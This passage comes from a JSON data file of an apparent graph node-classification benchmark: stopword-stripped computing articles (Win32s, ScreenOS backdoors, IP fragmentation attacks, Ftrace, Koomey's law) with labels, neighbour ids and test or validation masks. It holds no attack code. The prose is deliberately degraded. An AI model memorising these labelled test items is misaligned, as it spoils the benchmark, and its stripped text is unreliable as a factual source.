    "text": "Win32s:win32s win32s 32-bit application runtime environment microsoft windows 3.1 3.11 operating systems allowed 32-bit applications run 16-bit operating system using call thunks beta version win32s available october 1992 version 1.10 released july 1993 simultaneously windows nt 3.1 win32s intended partial implementation win32 windows api existed early versions windows nt win32s signifies subset win32s lacked number windows nt functions including multi-threading asynchronous i/o newer serial port functions many gdi extensions generally limited win32s applications specifically designed win32s platform although standard win32 programs would work correctly including microsoft 3d pinball space cadet windows 95 included applets office 95 early versions internet explorer version 5 also win32s compatible although also existed 16-bit format generally 32-bit application compatible win32s use 16mb memory extended features directx win32s inherits many limitations win16 environment true win32 applications execute within private virtual address space whereas windows 3.x used address space shared among running applications application running win32s shared address space cooperative multitasking characteristics windows 3.1 consequently win32 application run win32s must contain relocation information technique named thunking fundamental implementation win32s well chicago-kernel operating systems windows 95 windows 98 windows however allowing user-level thunking greatly complicates attempts provide stable memory management memory protection system-wide basis well core kernel security—this allows poorly written applications undermine system stability win32s well chicago-kernel systems stability security windows nt offer partially based thunking illegal except thunks win16 win32—the cpu must remain protected mode times windows xp later 32-bit versions windows transparently provide virtual machine running win16 applications although feature removed 64-bit versions windows win32s-compatible applications could built using microsoft development tools well least borland c++ 4.x however several program compilation options dlls implicit windows nt 3.1 included application win32s microsoft ceased support win32s visual c++ version 4.2 released late 1996 win32s included implementation card game freecell example application couple years game became famous inclusion windows 95 dos game included level editor required win32s run editor used windows gui displaying large maps high-resolution graphic modes already handled windows ncsa mosaic web browser version 2 also required win32s win32s still found using web search engines pw1118.exe generally installation file used developers ensure installing ole require consistent clipboard handling many applications need made ole aware i.e setting ole server must reinstalled win32s also included early win32 programs",
    "neighbors": [
      1922,
      4836,
      5318,
      8607,
      6797,
      10029,
      639,
      7983,
      3857,
      8976,
      9525,
      2943,
      5754,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 6985,
    "label": 2,
    "text": "ScreenOS:screenos screenos real-time embedded operating system netscreen range hardware firewall devices juniper networks beside transport level security screenos also integrates flow management applications december 2015 juniper networks announced found unauthorized code screenos since august 2012 two backdoors created would allow sophisticated hackers control firewall un-patched juniper netscreen products decrypt network traffic least one backdoors appeared likely effort governmental interest speculation security field whether nsa many security industry praised juniper transparent breach wired speculated lack details disclosed intentional use random number generator known security flaws could suggest planted intentionally 2011 leaked nsa document says gchq current exploit capability following screenos devices ns5gt n25 ns50 ns500 ns204 ns208 ns5200 ns5000 ssg5 ssg20 ssg140 isg 1000 isg 2000 exploit capabilities seem consistent program codenamed feedtrough",
    "neighbors": [
      10883,
      6276,
      9366,
      7319,
      2201,
      5531,
      9628,
      3885,
      10030,
      10291,
      6207,
      321,
      10561,
      1221,
      9927,
      9162,
      7887,
      6481,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      107,
      10482,
      4595,
      6516,
      11383
    ],
    "mask": "Test"
  },
  {
    "node_id": 6986,
    "label": 5,
    "text": "OpenTG:opentg opentg open-source implementation bulletin board system bbs software program written linux and/or unix written scratch jruby goal reproduce look feel functionality similar legacy bbs systems tag telegard maximus renegade written dos os/2 pre-internet communication era original code bbs used referenced order focus innovation unique capabilities august 17 2008 project founded chris tusa work toward version 1 code year later development branch known opentg/1 ended back-end configuration tool taken shape using ncurses library database abstraction using ruby-dbi postgresql backend database engine developer deemed version code failure due problems maintaining ncurses screen layouts sql queries dbi lessons learned upfront design planning iteration two known simply opentg heavy development code moved mri ruby jruby running openjdk latest code introduces status goal information available project homepage following listing software components used telegard/2 following tested operating system platforms used developers project founded currently led chris tusa hosted bitbucket uses mercirual source code control snapshots cloned github downloadable tarballs made available various intervals testing.. developers find information contributing project website",
    "neighbors": [
      1579,
      7983,
      5492,
      823,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 6987,
    "label": 4,
    "text": "2009_Sidekick_data_loss:2009 sidekick data loss sidekick data outage 2009 resulted estimated 800,000 smartphone users united states temporarily losing personal data emails address books photos mobile handsets computer servers holding data run microsoft brand phone affected danger hiptop also known sidekick connected via t-mobile cellular network time described biggest disaster cloud computing history sidekick smartphones originally produced danger inc. company bought microsoft february 2007 acquisition former danger staff absorbed mobile communications business mcb entertainment devices division microsoft worked future microsoft mobile phone platform known project pink however ex-danger employees soon left microsoft pursue things microsoft took running data servers data centers hosting customers data time lost friday october 2 2009 t-mobile sidekick phone users started noticing data service outages occurring outages lasted approximately two weeks october 10 2009 t-mobile announced personal information stored sidekick phones would permanently lost turned incorrect according financial times microsoft said data center acquired danger 18 months previously updated run microsoft technology company statement said mishap due confluence errors server failure hurt main backup databases supporting sidekick users t-mobile blamed microsoft loss data incident caused public loss confidence concept cloud computing plagued series outages data losses 2009 also problematic microsoft time trying convince corporate clients use cloud computing services azure phone october 14 2009 class action lawsuit launched microsoft t-mobile lawsuit alleged t-mobile microsoft promised safeguard important data customers possess apparently failed follow even basic data protection principles unthinkable day age class action lawsuit settled 2011 affected users compensated 35 t-mobile gift card 17.50 check payment 12 free downloadable items october 15 microsoft said able recover data would begin restore microsoft ceo steve ballmer disputed whether data loss instead describing outage ballmer said “ clear data loss however said incident good microsoft even data loss danger marketed application windows computers would back sidekick data onto user computer also allow changes made re-downloaded sidekick real-time users backup storage option able save data united states t-mobile marketed application one-time charge 10 immediately data restored users t-mobile incorporated sidekick storage website regular t-mobile backup site application user personal computer danger backup site t-mobile backup site could synchronized together",
    "neighbors": [
      4194,
      1083,
      2589
    ],
    "mask": "None"
  },
  {
    "node_id": 6988,
    "label": 2,
    "text": "Ftrace:ftrace ftrace abbreviated function tracer tracing framework linux kernel although original name function tracer came ftrace ability record information related various function calls performed kernel running ftrace tracing capabilities cover much broader range kernel internal operations various tracer plugins ftrace targeted different static tracepoints scheduling events interrupts memory-mapped i/o cpu power state transitions operations related file systems virtualization also dynamic tracking kernel function calls available optionally restrictable subset functions using globs possibility generate call graphs provide stack usage reports time ftrace used measure various latencies within linux kernel long interrupts preemption disabled ftrace-enabled linux kernel built enabling kernel configuration option entire runtime interaction ftrace performed readable writable virtual files contained specifically mounted debugfs file system result ftrace requires specialized userspace utilities operate however additional userspace utilities provide advanced features data recording analysis visualization examples utilities trace-cmd kernelshark internally ftrace relies gcc profiling mechanism prepend machine instructions compiled versions source-level kernel functions redirect execution functions ftrace trampolines tracer plugins perform actual tracing entry point instructions created gcc altered ftrace kernel booted varied later runtime ftrace nops actual jumps tracing trampolines depending tracing types options configured runtime ftrace developed primarily steven rostedt merged linux kernel mainline kernel version 2.6.27 released october 9 2008",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      10786,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      2255,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      9455,
      10482,
      5363,
      11506,
      2294,
      8439,
      2809,
      2811,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      5040,
      11184,
      1459,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 6989,
    "label": 4,
    "text": "Robert_Škulj:robert škulj robert škulj born 1975 slovenian hacker discovered security hole banking e-commerce system called klik year 2002 offered nlb bank sell exploit trojan horse designed empty victim account countermeasures bank reacted denouncing pressing charges illegal breaking systems charges soon dropped court škulj announced intends sue bank state seizing software discovered dead august 2003 apartment city tržič apparently committing suicide shooting death cloud suspicion looms boris floricic death",
    "neighbors": [
      3473
    ],
    "mask": "None"
  },
  {
    "node_id": 6990,
    "label": 4,
    "text": "Logparser:logparser logparser flexible command line utility initially written gabriele giuseppini microsoft employee automate tests iis logging intended use windows operating system included iis 6.0 resource kit tools default behavior logparser works like data processing pipeline taking sql expression command line outputting lines containing matches sql expression microsoft describes logparser powerful versatile tool provides universal query access text-based data log files xml files csv files well key data sources windows operating system event log registry file system active directory results input query custom-formatted text based output persisted specialty targets like sql syslog chart common use example selecting date time client username accessing aspx-files taken .log-files current directory",
    "neighbors": [
      929,
      6273,
      6797,
      10413,
      7983,
      4439,
      7838,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6991,
    "label": 5,
    "text": "KMLDonkey:kmldonkey kmldonkey graphical frontend mldonkey powerful p2p file sharing tool designed kde desktop key features kmldonkey 2.0.7 released together kde software compilation 4 within extragear-tarball",
    "neighbors": [
      4229,
      4490,
      7181,
      11029,
      10522,
      543,
      3366,
      6694,
      8621,
      7983,
      3770,
      8640,
      3407,
      3792,
      7384,
      3676,
      5085,
      3428,
      3813,
      5612,
      6257,
      7921,
      3828,
      5749,
      6389
    ],
    "mask": "Test"
  },
  {
    "node_id": 6992,
    "label": 4,
    "text": "IP_fragmentation_attack:ip fragmentation attack ip fragmentation attacks kind computer security attack based internet protocol ip requires data transmitted processed specifically invokes ip fragmentation process used partition messages service data unit sdu typically packet one layer network multiple smaller payloads fit within lower layer protocol data unit pdu every network link maximum size messages may transmitted called maximum transmission unit mtu sdu plus metadata added link layer exceeds mtu sdu must fragmented ip fragmentation attacks exploit process attack vector part tcp/ip suite internet protocol ip resides internet layer model ip responsible transmission packets network end points ip includes features provide basic measures fault-tolerance time live checksum traffic prioritization type service support fragmentation larger packets multiple smaller packets id field fragment offset support fragmentation larger packets provides protocol allowing routers fragment packet smaller packets original packet large supporting datalink frames ip fragmentation exploits attacks use fragmentation protocol within ip attack vector according kurose 2013 one type ip fragmentation attack attacker sends stream small fragments target host none offset zero target collapse attempts rebuild datagrams degenerate packets another attack involves sending overlapping fragments non-aligned offsets render vulnerable operating systems knowing causing crash ip packets encapsulated datalink frames therefore link mtu affects larger ip packets forces split pieces equal smaller mtu size accomplished several approaches three fields ip header used implement fragmentation reassembly identification flags fragment offset fields flags fragment offset specifies fragment position within original packet measured 8-byte units accordingly every fragment except last must contain multiple 8 bytes data obvious fragment offset hold 8192 2^13 units packet ca n't 8192 8 65,536 bytes data total length field ip header records total size including header data ip header least 20 bytes long maximum value fragment offset restricted 8189 leaves room 3 bytes last fragment ip internet connectionless fragments one packet may interleaved another destination identification field uniquely identifies fragments particular packet source system sets identification field packet unique value packets use source ip address destination ip address protocol values lifetime packet internet way destination distinguish incoming fragments belong unique packet buffer last fragment received last fragment sets fragment bit 0 tells receiving station start reassembling data fragments received following real-life fragmentation example following obtained using ethereal protocol analyzer capture icmp echo request packets simulate open terminal type ping ip_dest -n 1 -l 65000 results follows codice_1 note first fragment contains icmp header remaining fragments generated without icmp header two important points network infrastructure equipment routers load-balancers firewalls ids inconsistent visibility fragmented packets example device may subject initial fragment rigorous inspection auditing might allow additional fragments pass unchecked attacks may use fact evade detection placing incriminating payload data fragments devices operating full proxy mode generally susceptible subterfuge",
    "neighbors": [
      5472,
      8998,
      7817,
      842,
      7855,
      4689,
      3473,
      8692,
      4725,
      5402,
      5531,
      5469,
      5245
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6993,
    "label": 5,
    "text": "List_of_TCP_and_UDP_port_numbers:list tcp udp port numbers list tcp udp port numbers used protocols internet protocol suite operation network applications transmission control protocol tcp user datagram protocol udp needed one port full-duplex bidirectional traffic stream control transmission protocol sctp datagram congestion control protocol dccp also use port numbers usually use port numbers match services corresponding tcp udp implementation exist internet assigned numbers authority iana responsible maintaining official assignments port numbers specific uses however many unofficial uses well-known registered port numbers occur practice similarly many official assignments refer protocols never longer common use article lists port numbers associated protocols experienced significant uptake port numbers range 0 1023 0 2 − 1 well-known ports system ports used system processes provide widely used types network services unix-like operating systems process must execute superuser privileges able bind network socket ip address using one well-known ports range port numbers 1024 49151 2 2 2 − 1 registered ports assigned iana specific service upon application requesting entity systems registered ports used without superuser privileges range 49152–65535 2 2 2 − 1 contains dynamic private ports registered iana range used private customized services temporary purposes automatic allocation ephemeral ports",
    "neighbors": [
      514,
      2563,
      10756,
      521,
      6153,
      8204,
      5647,
      10255,
      8211,
      5652,
      2581,
      3094,
      3610,
      10271,
      6689,
      10274,
      2084,
      2085,
      9764,
      7208,
      2601,
      1579,
      6700,
      3118,
      7214,
      6704,
      562,
      4660,
      8763,
      3133,
      1087,
      64,
      10816,
      581,
      7750,
      1607,
      8265,
      7248,
      8796,
      10334,
      9316,
      1125,
      614,
      10341,
      10344,
      107,
      3181,
      5749,
      119,
      2168,
      11387,
      6780,
      6273,
      131,
      1668,
      4229,
      5251,
      8331,
      140,
      6796,
      9867,
      9868,
      9360,
      3218,
      4242,
      8340,
      9365,
      2710,
      3735,
      152,
      4760,
      7318,
      8344,
      10908,
      11413,
      7327,
      10402,
      9380,
      9381,
      11428,
      9383,
      3752,
      8360,
      11429,
      10924,
      9389,
      10413,
      1200,
      6834,
      7347,
      2228,
      7859,
      9909,
      7863,
      1211,
      700,
      4797,
      704,
      3777,
      6338,
      7361,
      708,
      7364,
      710,
      4294,
      8386,
      202,
      11468,
      1743,
      3792,
      5843,
      8404,
      8408,
      8920,
      1242,
      1754,
      8413,
      7391,
      3297,
      9441,
      7908,
      10990,
      7407,
      9455,
      5875,
      10486,
      7928,
      11001,
      3323,
      9471,
      771,
      11011,
      8455,
      5384,
      8969,
      8975,
      4373,
      5397,
      11030,
      5405,
      2338,
      6946,
      8998,
      3879,
      9511,
      10024,
      4396,
      8495,
      6451,
      9012,
      3382,
      823,
      4919,
      8504,
      10747,
      11065,
      829,
      11581,
      1856,
      2373,
      2887,
      841,
      10058,
      5451,
      7500,
      10060,
      849,
      1363,
      2387,
      3412,
      7003,
      2908,
      8539,
      2910,
      5471,
      9569,
      3939,
      871,
      11112,
      5482,
      7019,
      3437,
      3949,
      5485,
      7022,
      4979,
      11126,
      3959,
      1400,
      7031,
      891,
      3966,
      4993,
      7554,
      4485,
      904,
      6541,
      6548,
      7572,
      2970,
      3482,
      5531,
      7068,
      10144,
      929,
      10659,
      933,
      6567,
      425,
      8621,
      9647,
      2994,
      11699,
      2996,
      8628,
      5047,
      5048,
      5559,
      9655,
      1467,
      10171,
      3006,
      6591,
      8640,
      4546,
      7626,
      10698,
      974,
      9167,
      6098,
      979,
      5589,
      3030,
      8668,
      4061,
      5085,
      8670,
      4068,
      4580,
      6628,
      10727,
      4589,
      6127,
      11249,
      4084,
      6134,
      7673,
      6650,
      6651,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 6994,
    "label": 9,
    "text": "PC-LISP:pc-lisp pc-lisp implementation franz lisp dialect peter ashwood-smith version 2.11 released may 15 1986 current version may downloaded external link currently pc-lisp ported 32 64 bit linux mac windows note franz lisp dialect immediate portable successor version maclisp perhaps closest thing lisp steven levy book practical operate pc-lisp runs well dos emulators modern windows versions pc-lisp implements franz lisp dynamically scoped predecessor modern common lisp therefore historically important implementation session running following code demonstrates dynamic scoping franz lisp note pc-lisp implement codice_1 special form emacs lisp provides local variables instead variables algol-based language would call global first dialect lisp incorporate algol scoping rules called lexical scoping scheme although common lisp language also added feature another example showing use backquote power lisp differentiation example",
    "neighbors": [
      512,
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      205,
      1613,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      1147,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 6995,
    "label": 2,
    "text": "CyberGraphX:cybergraphx cybergraphx pronounced cybergraphics standard retargetable graphics api available amiga compatible systems developed thomas sontowski frank mariak later adopted phase5 use graphics cards many graphics card manufacturers offered hardware amiga compatible systems used well latest version cybergraphx v5 used morphos features include original cybergraphx software amigaos longer actively maintained cybergraphx v4 last release platform far aros implements cybergraphx v4 compatible api alternative rtg apis picasso 96 enhanced graphics system first used amigaos4 implements cybergraphx v4 api v5 extensions 2560×1600 running dual-link dvi example radeon 9650 256 mb",
    "neighbors": [
      8832,
      9249,
      9762,
      4387,
      4581,
      10570,
      9848,
      5743,
      8369,
      8114,
      8115,
      9236,
      2197,
      4567,
      8120,
      8700,
      11487
    ],
    "mask": "None"
  },
  {
    "node_id": 6996,
    "label": 2,
    "text": "Nokia_E51:nokia e51 nokia e51 symbian os smartphone nokia announced 18 september 2007 replacement nokia e50 business-focused eseries line second nokia umts hsdpa dual band device phone available black silver bronze-coloured border backplate slim body made stainless steel 12 mm thick 100 g weight smallest nokia smartphone time yet still technologically capable like s60 devices time version without integrated camera also existed e51 highly acclaimed succeeded nokia e52 br",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      10271,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      9909,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      5998,
      1776,
      8433,
      5875,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 6997,
    "label": 4,
    "text": "Justniffer:justniffer justniffer tcp packet sniffer log network traffic 'standard web server-like customized way also log response times useful tracking network services performances e.g web server application server etc. output format traffic easily customized example written python delivered official package stores transferred contents output directory separated domains means transferred files like html css javascript images sounds etc saved directory justniffer born help troubleshooting performance network tcp-based services http rtsp sip smtp imap pop ldap telnet etc collect low high level protocol performance information reconstructing tcp flow reliable way using portions linux kernel code uses slightly modified version libnids libraries already include modified version linux kernel code reusable way extended external scripts bash python executable generate logs customizable way man page justniffer explains options",
    "neighbors": [
      9440,
      1064,
      6345,
      842,
      8554,
      1580,
      10924,
      11112,
      7983,
      10705,
      9939,
      2292,
      5397,
      9909,
      823,
      381,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 6998,
    "label": 8,
    "text": "Parasoft_Virtualize:parasoft virtualize parasoft virtualize service virtualization product create deploy manage simulated test environments software development software testing purposes environments simulate behavior dependent resources unavailable difficult access difficult configure development testing simulates behavior dependent resources mainframes erp systems databases web services third-party information systems systems direct developer/tester control product used conjunction hardware/os virtualization provide developers testers resources need execute development testing tasks earlier faster completely technologies automating continuous testing used part continuous delivery continuous integration continuous release 2002 parasoft released technology create service implementation stubs emulate critical functionality made available testing. technology introduced parasoft soatest since 2002 technology extended intelligent stubs emulate behaviour running system allowing developer test services context application actual behaviour live running system. 2009 technology extended application behavior virtualization create copies applications back-end systems developer reference applications systems developing software technology extended released separate product 2011 parasoft created free community edition 2017 allows individual users small projects use service virtualization cost parasoft virtualize awarded 2012 jolt awards grand prize panel dr. dobb journal-appointed judges annual award showcases products jolted industry significance made task creating software faster easier efficient recent awards/recognitions received named leader functional test automation tools forrester functional test automation tools evaluation innovation technology leader voke service virtualization market mover array",
    "neighbors": [
      2465,
      2658,
      9509,
      11208,
      4171,
      823,
      6797,
      7983,
      1687,
      1689,
      3583
    ],
    "mask": "Test"
  },
  {
    "node_id": 6999,
    "label": 7,
    "text": "ElasticHosts:elastichosts elastichosts computer service provider based london england founded provides cloud computing service provided ten data centres united kingdom two sites netherlands united states four sites canada hong kong australia elastichosts privately held competes public cloud-infrastructure providers amazon elastic compute cloud rackspace cloud according ceo richard davies company aims provide servers set similar possible one would provision dedicated hosting exception customer self-serve time elastichosts eu hosting data centres uk ireland first public cloud service built linux kernel-based virtual machine rather xen api given good review rest perspective charges resources cpu memory disk network separate entities allowing customers build virtual machines widely different characteristics instead simply categorized ones small medium large instances elastichosts therefore licensees supported directly boxgrinder included fedora 15 may 2011 elastichosts cloud servers available ten data centres san jose los angeles dallas miami maidenhead uk portsmouth uk amsterdam toronto hong kong sydney elastichosts persistent storage based local host store however 2012 announced solid-state drives ssd instance sizes use storage area network instead directly attached raid arrays iscsi interconnects hosts 2011 ceo predicted greater demand storage elastichosts two types ipv4 addresses static dynamic allocated pools addresses static addresses kept account allocated account server time dynamic ones randomly allocated server specifically allocated static ip address guaranteed remain though remain lifespan instance shutdown virtual machine may may reallocate ip address elastichosts lock static ip server instance reallocated control panel reverse dns managed customer control panel elastichosts announced 14 april 2014 addition maintaining traditional cloud vm business releasing alternate type server based linux running within containers implementation similar chroot bsd jails uses advanced linux kernel control groups feature company deemed mature enough use basis new type cloud server launched name elastic containers claiming world first terms virtualization company currently offers versions debian ubuntu centos though nature containers run host linux kernel containers new technology cgroups features first begun added linux kernel 2007 companies docker inc. producing software uses virtualize applications claimed first time iaas provider used technology full operating system use various press articles focused newly released pay go billing option whereby container optionally billed actual usage opposed fixed instance size 15 minute increments common industry standard 1 hour time blocks cloud server rentals particular ceo claim customers could save 50 traditional costs using service analysts expressed confidence container based systems future cloud providers given fiercely competitive nature cloud pricing days ’ hard see containers ’ become dominant mechanism delivering cloud services though others wondered whether would actually pull customers dominating players market owen rogers senior analyst digital economics 451 research noted though “ interesting unique ” model give elastichosts advantage ... rest market ... still based virtual machines can¹t see changing overnight ” wondered whether ... consumers really care elastichosts ’ detailed – arguably fairer – method pricing bigger competitors slashing prices elastichosts acquired paragon internet group april 2016 paragon acquired host europe group late 2015 host europe group acquired godaddy december 2016 meaning elastichosts ultimately subsidiary godaddy",
    "neighbors": [
      4194,
      39,
      7863,
      4429,
      6999,
      823,
      8439,
      2910
    ],
    "mask": "None"
  },
  {
    "node_id": 7000,
    "label": 2,
    "text": "COMSPEC:comspec comspec comspec one environment variables used dos os/2 windows normally points command line interpreter default command.com dos cmd.exe os/2 windows nt variable name written all-uppercase dos os/2 windows also supports lowercase environment variable names variable name comspec inside dos emulator ntvdm dos programs comspec cmd.exe variable contents displayed typing set comspec echo comspec command prompt environment variable default points full path command line interpreter also made different company different version",
    "neighbors": [
      7847,
      6797,
      3856,
      8976,
      3571,
      532
    ],
    "mask": "Test"
  },
  {
    "node_id": 7001,
    "label": 3,
    "text": "Iris_WorkSpace:iris workspace iris workspace graphically organized iconic desktop environment allowed access irix file system along simplified system administration via system manager iris workspace used silicon graphics 4d1-3.0 irix 5.0 succeeded 1993 indigo magic desktop introduced irix 5.1 indy workstation",
    "neighbors": [
      7234,
      6243,
      5380,
      10051,
      11447,
      5898,
      6858,
      5356,
      9932,
      7311,
      5523,
      5076,
      3764,
      1398,
      5272,
      221,
      7001,
      1149
    ],
    "mask": "None"
  },
  {
    "node_id": 7002,
    "label": 3,
    "text": "Socket_478:socket 478 socket 478 also known mpga478 mpga478b 478-contact cpu socket used intel pentium 4 celeron series cpus socket 478 launched northwood core compete amd 462-pin socket athlon xp processors socket 478 intended replacement socket 423 willamette-based processor socket market short time socket 478 phased launch lga 775 2004 socket 478 used northwood pentium 4 celeron processors supported first prescott pentium 4 processors willamette celerons along several willamette-series pentium 4s socket 478 also supported newer prescott-based celeron processors early pentium 4 extreme edition processors 2 mib l3 cpu cache celeron processors also available socket 478 last cpus made socket intel mobile cpus available 478-pin packages fact operate range slightly differing sockets socket 479 socket socket p incompatible two socket 478 used combination ddr sdram socket pentium 4 celeron following mechanical maximum load limits exceeded heatsink assembly shipping conditions standard use load limits crack processor die make unusable see list intel chipsets pentium 4 chipsets",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      3892,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      10734,
      1776,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 7003,
    "label": 5,
    "text": "QOTD:qotd quote day qotd service member internet protocol suite defined rfc 865 indicated qotd concept predated specification qotd used mainframe sysadmins broadcast daily quote request user formally codified prior purposes well testing measurement purposes host may connect server supports qotd protocol either tcp udp port 17 keep quotes reasonable length rfc 865 specifies maximum 512 octets quote although sources indicate qotd service rarely enabled case often firewalled avoid 'pingpong attacks interest continues pre-existing purpose serving quotes seen web engine searches current testing measurement ip networks commonly done ping traceroute robust adaptations echo protocol rfc 862 predated attempt qotd standardization",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      933,
      2085,
      3751,
      3752,
      8998,
      9381,
      10924,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      849,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      871,
      10344,
      2409,
      11112,
      367,
      8432,
      11249,
      8692,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 7004,
    "label": 4,
    "text": "Elegant_degradation:elegant degradation elegant degradation term used engineering describe occurs machines subject constant repetitive stress externally machine maintains appearance user appearing function properly internally machine slowly weakens time eventually unable withstand stress eventually breaks compared graceful degradation operational quality decrease breakdown may sudden term meaning varies depending context field may strictly considered exclusive engineering instance used mechanism food industry applied degradation lignin cellulose pentosan polymers among others concept also used extract chemicals elegant degradation paederus fuscipes obtain pederin hemiacetal pseuodopederin process degradation induced heat play name also used metaphor current state world",
    "neighbors": [
      9677
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7005,
    "label": 6,
    "text": "ObjectiveFS:objectivefs objectivefs distributed file system developed objective security corp posix-compliant file system built object store backend initially released aws s3 backend later implemented support google cloud storage object store devices released beta early 2013 first version officially released august 11 2013 objectivefs implements log structured file system top object stores amazon s3 google cloud storage object store devices posix compliant file system supports features dynamic file system size soft hard links unix attributes extended attributes unix timestamps users permissions limit file size atomic renames atomic file creation directory renames read write anywhere file named pipes sockets etc implements client-side encryption uses nacl crypto library algorithms like salsa20 poly1305 approach n't data-dependent branches data-dependency array indices protects cache timing attacks data encrypted leaving client stays encrypted rest motion one main difference objectivefs glusterfs/cephfs offloads storage cluster management cloud providers amazon/google objectivefs software runs server talks object store using s3 api software handles metadata multiple servers sharing files handles negotiation sharing servers also running objectivefs use cases scaling web servers mail servers content management services cms hybrid cloud. hybrid development environment laptop cloud",
    "neighbors": [
      3328,
      3909,
      2314,
      7983,
      823,
      346,
      2395
    ],
    "mask": "None"
  },
  {
    "node_id": 7006,
    "label": 3,
    "text": "Koomey's_law:koomey law koomey law describes trend history computing hardware half-century number computations per joule energy dissipated doubled every 1.57 years professor jonathan koomey described trend 2010 paper wrote fixed computing load amount battery need fall factor two every year half trend remarkably stable since 1950s r 98 2011 koomey re-examined data found 2000 doubling slowed every 2.6 years related slowing moore law ability build smaller transistors end around 2005 dennard scaling ability build smaller transistors constant power density difference two growth rates substantial doubling every year half results 100-fold increase efficiency every decade doubling every two half years yields 16-fold increase koomey wrote implications koomey law amount battery needed fixed computing load fall factor 100 every decade computing devices become smaller mobile trend may even important improvements raw processing power many applications furthermore energy costs becoming increasing factor economics data centers increasing importance koomey law slowing koomey law implications energy use information communications technology however computers run peak output continuously effect slowing may seen decade koomey writes exponential trend one eventually end ... decade energy use dominated power consumed computer active active power still hostage physics behind slowdown moore ’ law. koomey lead author article ieee annals history computing first documented trend time koomey published short piece ieee spectrum discussed mit technology review post erik brynjolfsson “ economics information ” blog economist online trend previously known digital signal processors named gene law name came gene frantz electrical engineer texas instruments frantz documented power dissipation dsps reduced half every 18 months 25 year period latest studies indicate koomey law slowed doubling every 2.6 years second law thermodynamics landauer principle irreversible computing continue made energy efficient forever 2011 computers computing efficiency 0.00001 assuming energy efficiency computing continue double every 1.57 years landauer bound reached 2048 thus 2048 koomey law longer hold landauer principle however applicable reversible computing 'beyond cmos future computing technologies as-yet undeveloped would represent entirely new efficiencies beyond koomey law",
    "neighbors": [
      6656,
      2273,
      5798,
      5802,
      3596,
      78,
      8367,
      785,
      1778,
      6801,
      153
    ],
    "mask": "Test"
  },
  {
    "node_id": 7007,
    "label": 8,
